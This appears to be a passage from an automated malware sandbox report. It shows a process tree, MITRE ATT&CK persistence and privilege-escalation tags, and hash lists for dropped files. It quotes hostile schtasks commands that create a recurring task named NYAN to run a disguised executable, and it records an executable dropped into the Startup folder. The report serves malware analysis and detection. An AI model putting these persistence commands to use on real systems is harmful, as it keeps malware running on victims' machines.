- Executes dropped EXE
PID:5504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F3⤵PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 13⤵
- Creates scheduled task(s)
PID:5492
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 16042⤵
- Program crash
PID:2128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4380 -ip 43801⤵PID:5716
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
706B
MD57119a280abc0c4b5f21a0932887a54ac
SHA1aa369248ea6d293fe56a5ed669e29cd897911f84
SHA256418398bab7542ba692fe00d88d6de06c65f73b9376567c5190a007f7a211c91f
SHA512b11111d017e86445be9c41d2ca4a6e147cf2d8ae31663bb0772e2eaaf3a7a906285ab78a708d9122a29f8aa2519e80b12e050ad4538867e2b5d3edb0fe21039f
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5baae53960a16dc597dd58f7483d0e244
SHA11652ebb8d43bdd394477e3ac971164987a8d180f
SHA2569d04961f6061cafe3ecbe37d17e15f49e912c865534770f6c31d72e1ab5c3489
SHA512199027fbd5d8cdb8876b397d625656bc7144019f4463655ccd2859099fb581918cc7fa91e08eb58526e3676a0d9e8d2400994f141e89d4c1aae6fe68f945de0b
-
Filesize
18KB
MD5f3ff369ed4627592f38e9d8b56b9860e
SHA19bca1801767c963f031a3a086629da99e06afbc7
SHA25635ac065038538d4ab322bf6d557fb135d1b459ebd151ec50cf6d6166adbf6bb0
SHA5129054088b3a1393483244325d7cc56939df101b0a279f1e08b4e30db8397f38fbb039458ff23bc33dc11d460445ea8a57be760c06962eed29ef6604fbe05edeac
-
Filesize
18KB
MD5057819fcfdbf14ab966a39eedafbde4f
SHA1e20c61d2833f4170c91384f36170c239d3c548ea
SHA25665d033459b7c49b191298a85776042837322039bbfed517cca7740dcd36f4dfb
SHA512920ecc541444615127d57074dfcee2e16d7b717a1de53dd6b8ccd8a608d904a4dd81bb392258b64d895dae7e6225339ffbafeecfe5276b7276f577232c011221
-
Filesize
18KB
MD5329952f834379bf2875b4db251d912f3
SHA127b4ec4d29d10adb409741320fefe61a3218b5c4
SHA2568dd5f3fe1a41b95d55dc8b6dcd14dd9fdfbc156d6fc237dceced77c4b3fd1dbd
SHA5126a4ab97add77f5aabf3ccf03804cdfd30c0dfef3df085819495cb1c6c919f3b3e5627cfe4d0edb765330c8b8280f125f0596a606dc017906f5ae486de80b3f3b
-
Filesize
18KB
MD52b61613deb3c401d5958654afbf238e4
SHA1ffa7f35252df7925186f28cd37d0ffb9167ff1ee
SHA25696dad8750fd7a590a6a4f5cb243ab55e9ea4d9c46bbe797ef2bac168e78f27ff
SHA512d05f89130a2fbcb5d8ab63eea324edc35cd10a40976b8d0caa0e3c1bf011ac45d45bb4cf8a07fee956cf30550afabee860a5a0299324b65aacf46b787f85f87e
-
Filesize
18KB
MD576283a739a91052d8e15b06e224886ab
SHA1e3f575d73ce1ffd954097a5ec05308dbc4c77f26
SHA256ffdb32151113d42f976eda98773365b61dcce26f909652bf102c3f4177e087b5
SHA512f853b0d923ef85a2402e034bc77c642de74737ec6f7a09f26d2ee25cb8ef5774e9676c0300b839395690e0ebaf75e7903ade967c07e50662599a390503c66113
-
Filesize
18KB
MD5ee8e51193bb9bd7102bda5424230d274
SHA1091b226ca758ec2406ccb7b1fee35f52535ded7d
SHA2562cf262e516568164690da14e3a0ef1ef8d0d9748185eef3a1443969c5d8451c1
SHA512562c25b7a1e16e62acfc30bb5c8b592a5ee9ce6db7add2dbc91a95bf499abf1adb2cbd9b1116a82faa18b689c12adc040fbc9a320308051170629c6f196058f0
-
Filesize
18KB
MD533ca929e023719ea658483a8003440f3
SHA1ea074ddf22c609d268937dfbf9890805b998d1f0
SHA256e070605c605d04fe98743fbb7910808cb9c6653e7d0e644ef7aa7c2959e6685b
SHA5126e5d11cd83e6f1df12793b648e66b0e457067f83e2893251022c6d3d31521650a9f0d2c4cf3303f142c5cb9597af97fefe7d9738d8d9863957f26105951bcab7
-
Filesize
18KB
MD573627b3a4a23005b8d8a4f44ee956d09
SHA1d9f48698f83851d6d59cb5db1b2e8d05588125e8
SHA256825e543611c2dc08f89f4eda465a9df84d050b9594bb2ff745e5cfbd8452626a
SHA5123c574e508aaa8affd25520d1e0dfc09e0dc49401f63bcf82f96c9c4cedc7152431679aef9be1f820dfdf6774d9a364bfee7c4c7b413edd77b128126ea4ff291a
-
Filesize
18KB
MD5b1ee8842dc4d0a87f5e02577a193efde
SHA1cbb85515032a6729d728341e5093b81b7b79fb9c
SHA25672493c1ce10829c803abd37bd10d628722e80014a5c31c6b0dfa050a99b9fbd7
SHA512d2360f52adf4af4c2862d35a045dc7395baba5dd9357d8ef2d67458604a9bbf18336bcaa2cce92b5a02598ac21cda78377e78b5b4a9b9734cf2f4bc1e4aad4ae
-
Filesize
18KB
MD56a93937d54e9fd95fb056f6d64d075ed
SHA18502f83f952b07a1fdf0e6d70fb9808ebb14195d
SHA2560833790b15fb1c86c4263ea85368896b71d58ad6f6497cc6ac97b52b20114c10
SHA51285e0171b694c18e8bd44c77fdb441f34f3c535fff5c0ca1925660957188369c8b88c6740c2e5b785cd39d990f5f8e42102736dae03acf158f4657ff52f519beb
-
Filesize
18KB
MD53066c5fda9cb7ef23c35380b45f3a583
SHA1ffc39b2adad1b8456d4fc3f0562aa4fd359bb7e0
SHA256ed1fb092e9ad637e4a9bbb4ffb0ef9d9f420752ef2d0593bd3eb2ef4bc731720
SHA512c726decb49b1fb0d55909f4b1d395da8a1a7a1982a044bcbedb21521247e33ef55632527b8585dd210fb0bd2198dd5c37c63f579d0ba8153b9a9b750d3ca6dc0
-
Filesize
18KB
MD53b763c0f171168322352b7c2d44f0363
SHA1a462f3abb60f9d9183261a7a8b561841fa0d5acc
SHA25650f12d1c7f69b71bac2d15bc83e87f94e1d2f8539df2aad2b45c84ef4d1c0693
SHA512a8ed2a2419d723ac97fc442351e8cfde2f528f9f80273fe29d21c21c166d31fb083d7da60c93dbf804ae23ee57e50c13bd78e7056250506fa4adaf28c7ba6342
-
Filesize
18KB
MD5ef0ff7fab3698e36f71ff2e5104a0cbb
SHA1b5f931fe2ab8c7f52cdc72c94dd2bfceab266845
SHA2564ac50ebcf55d17aba4e6e8a2ef02a518b65400940fcf472d8f9ff7c83cde42c3
SHA512a4fbb43a7fc248ea358d8b0b93dc84629ec0716549da8e91e109e17fd4a2800be9f7f14f83c052dbaf8f881f76f83dc9737f8e6116845fb656c37b659dd6ef59
-
Filesize
764B
MD55cc6f319006e65e83cf5a83452ef1462
SHA1deab3bf72efa0c849b5dfd2b384e3889001d0178
SHA25673669629d189346d53326de4715f65fdcd571bfb3681f97c78f195c2869b782e
SHA5125042589a9d5d8b7b9fc8319bc989d0b0353b54877361e663d5301cca69f5d5683db7f90ec7218a51de35f4f61d4cf283feef634a8e296b9a93c8cd5c51650129
-
Filesize
552B
MD51a3c8348583151adec3f6b7c3669c886
SHA19d9ace9ebb4fe417bbc72f5e5a6c4441d8746c60
SHA25656bbea00d94ce1668accae9d334c775b324d6349cebde9439c4d03632bae825e
SHA5129ed0f7a06acbdff7ef7dceb0f4debb7bd5237107901fff074e3a77cb417ba89a3d0e8dfaa2ad86bc5e38f2b587f043872bfcdfc123c938c6bcb6ef5e65ea8eb6
-
Filesize
18KB
MD5bd76416a086fedc4c0e2abaaf74525fb
SHA127992c39e25de4d7d49a4762a25ced1160bcd521
SHA256bc8bcf7709b2b5c4a0b32047c2e1be3f7b2492ac892ea75745c84cf999ffb8c6
SHA5122fe2afdace104e4328b479909459dc248484537c8af59b57201986562f353c99a7dac0e4e68bdccc85fd0e26c547f49e30a8b40ea7e970fd88077c20f48716a1
-
Filesize
64B
MD574d7095da2833bb0dff8c00536ca95c1
SHA18ba1052306aa360adcaee670666e2c42044b0018
SHA2569f088611b35f28d77a330c0aa545269a25eecc9411566cd33fa2f7d72a671244
SHA512b82a5b5fdd7703740305514f09adbdb22caab6d0b36e49867fa470932f0ef11ad78c4defdcb0342642202ec432ec281864dd3096e82ddf84a8db8895620e751b
-
Filesize
1KB
MD58c4217af9f07bded779a75b814d05119
SHA1fa8c23e1a873815a740c31487b058fac7efdddc8
SHA2565c3c39026f031c34978cf4ca3a32b568b54f8103ceda5580969537b196d21671
SHA512ca8cd0eea48f541160943cb0379c3c71de9b9425769299ad0c17daa101b24882b05d472ab93d9e025968ab91ea038561223ecc506dd53a42bdf60a185c38b786
-
Filesize
724B
MD52002a1cb17c93d10191f253e2f29b73b
SHA13befbcd3100b5c64e5171e6837389c24dc8ed8f0
SHA256719bf57a58c0ce85fdfce8f61ea17c234f4765792b37d070d3bbb56604c75866
SHA51204faf60afc929a0c0ab86c2bc08a9f3365b7706b615b3136d9abf7be04f18477a5d82d34cfd0622cc9dfe42773ba57a02a964eb65aa962b515e5a68f46605018
-
Filesize
8KB
MD5b2a5ef7d334bdf866113c6f4f9036aae
SHA1f9027f2827b35840487efd04e818121b5a8541e0
SHA25627426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e
SHA5128ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e
-
Filesize
88KB
MD517fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Filesize2.0MB
MD5730e216d275e35cbb81d3f1b709b228b
SHA121b92b5eb008a4eebd3f517b1716bc0851c76721
SHA25680502885722e2b1e083a55428641eb89be7c40b7aef5eb5c64860c8063238d19
SHA51202fc645558067f18f43820f79b41ec19d060c8b533cd87fa090693150ca8342efed59d9e6dd75da74c2e3184e330d6ab5fb97b83b4a712dc4507ca76da9a2a88
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Filesize1.4MB
MD575943786884d898bcd0b33357bd0d4f0
SHA13224fea4ab0d7d802557d40a7397f62851ace5b2
SHA2563f4c6c332c7663cb00a26ebf7a96a86158f860c05aab166b14a322cf2756249f
SHA5124c260f01ce462b7447b466fdd29b0793fdcb87c3767b1606e15465c02b9bda07583cbb4d582e4410a86931854a4ff2dc6822017a2ebebf8615dc89ea85971e5e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Filesize1.7MB
MD5715f46ac730dde8d1439d6b78da3050c
SHA1ea95023b269af1e801286d341ac5499ea34cfd6f
SHA256c088f887a120770807cc09e3bad4da8a095f53f792bffa3ed751b5dc1c9b9347
SHA51254821dcc99b4ec5183861ee0ad8ac358d60f29b4c10877df8992e40bc9577cc220ca3f580ed232c232f504aa2127992d4d01703dad5597944baf83c954c4718e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
Filesize939KB
MD54f70e8af9ae9f628b8a1b4ddd76d911c
SHA1505ea25565d741edc020925ead156e6fd7d7487f
SHA256555e6e85bccacb4db1cde30167bfdca8bcc16392e19031e943cc864d07f8aca3
SHA5128309c77f724c8e8b81d6486488ca7c01e80c1826c5a50022ac788ddaa31d8b5f9f13b00b480aa7acc1f2595703d6969da681b647855335fdc4ae26eaf7591c81
-
Filesize
72KB
MD581bda5dffbd964c6199ff8f9fb62c386
SHA1ea645805a8e9872304e402832b6fbfc96bdb660a
SHA25689c860c035a86b1e1c1af540eaaabb15db50a15c70086b2d986a159c32d1e918
SHA512bb9baaac4c57a703bc0f3e7307ed4596a6d10ea90a5f6fd48e06d3a015447aa644b9f8ab5e0496a3cb8a738fd6bc72c3158c4203530a4342b555473197bc71f1
-
Filesize
28KB
MD5cbca9027b0f391f421bc236ca417848c
SHA10d1e83363f5c030c83a746d74a609778e05432a8
SHA2567d02fbfd3d9b209f24bdd1727a979c1bacf83f5d12a2b618e05c36ba40ff826f
SHA51248b6b28d4aa7004e047e62d2a37c5ec0f73f8e6546e21913b7627d4daf15e6556730216bee63a8974afa2666494f7d235ef8b9be64dce7aeee6e444757acb46f
-
Filesize
2.8MB
MD5796ed4b0db9b3d50149b39c35c97fb22
SHA1154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
SHA25637db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7